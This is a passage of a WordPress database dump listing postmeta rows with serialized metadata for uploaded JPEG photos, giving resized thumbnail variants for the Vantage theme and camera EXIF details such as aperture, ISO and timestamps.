s:4:\"file\";s:20:\"DSCN3607-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3607-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3607-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3607-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1466014704\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"144\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00919963201472\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(700,357,'_wp_attached_file','2017/01/DSCN3645.jpg'),(701,357,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3645.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3645-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3645-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3645-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3645-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3645-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3645-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3645-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3645-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3645-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3645-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3645-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3645-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1466365253\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"120\";s:3:\"iso\";s:3:\"323\";s:13:\"shutter_speed\";s:15:\"0.0166666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(702,358,'_wp_attached_file','2017/01/DSCN3828.jpg'),(703,358,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3828.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3828-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3828-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3828-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3828-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3828-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3828-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3828-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3828-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3828-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3828-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3828-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3828-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472301135\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"97.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00214915108532\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(704,359,'_wp_attached_file','2017/01/DSCN3833.jpg'),(705,359,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3833.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3833-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3833-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3833-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3833-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3833-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3833-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3833-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3833-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3833-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3833-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3833-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3833-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472301369\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"97.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00229147571036\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(706,360,'_wp_attached_file','2017/01/DSCN3882.jpg'),(707,360,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3882.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3882-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3882-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3882-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3882-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3882-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3882-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3882-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3882-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3882-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3882-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3882-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3882-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472924285\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"23\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0027027027027\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(708,361,'_wp_attached_file','2017/01/DSCN3884.jpg'),(709,361,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3884.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3884-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3884-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3884-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3884-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3884-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3884-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3884-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3884-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3884-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3884-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3884-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3884-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472924308\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"13.4\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00183418928833\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(710,362,'_wp_attached_file','2017/01/DSCN3888.jpg'),(711,362,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3888.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3888-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3888-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3888-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3888-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3888-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3888-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3888-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3888-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3888-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3888-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3888-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3888-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472924480\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"16.9\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00294117647059\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(712,363,'_wp_attached_file','2017/01/Fall-Frenzy-001.jpg'),(713,363,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:27:\"2017/01/Fall-Frenzy-001.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Fall-Frenzy-001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Fall-Frenzy-001-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Fall-Frenzy-001-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"Fall-Frenzy-001-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:27:\"Fall-Frenzy-001-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:27:\"Fall-Frenzy-001-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"Fall-Frenzy-001-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:28:\"Fall-Frenzy-001-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:27:\"Fall-Frenzy-001-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:27:\"Fall-Frenzy-001-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:27:\"Fall-Frenzy-001-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:27:\"Fall-Frenzy-001-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1187184232\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"72\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(716,365,'_wp_attached_file','2017/01/Kussatz-1.jpg'),(717,365,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:21:\"2017/01/Kussatz-1.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Kussatz-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Kussatz-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Kussatz-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"Kussatz-1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:21:\"Kussatz-1-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:21:\"Kussatz-1-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Kussatz-1-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:22:\"Kussatz-1-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"Kussatz-1-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"Kussatz-1-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"Kussatz-1-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:21:\"Kussatz-1-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1186169425\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"6\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(718,366,'_wp_attached_file','2017/01/leonturkey02.jpg'),(719,366,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:24:\"2017/01/leonturkey02.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"leonturkey02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"leonturkey02-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"leonturkey02-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"leonturkey02-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:24:\"leonturkey02-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:24:\"leonturkey02-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"leonturkey02-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a: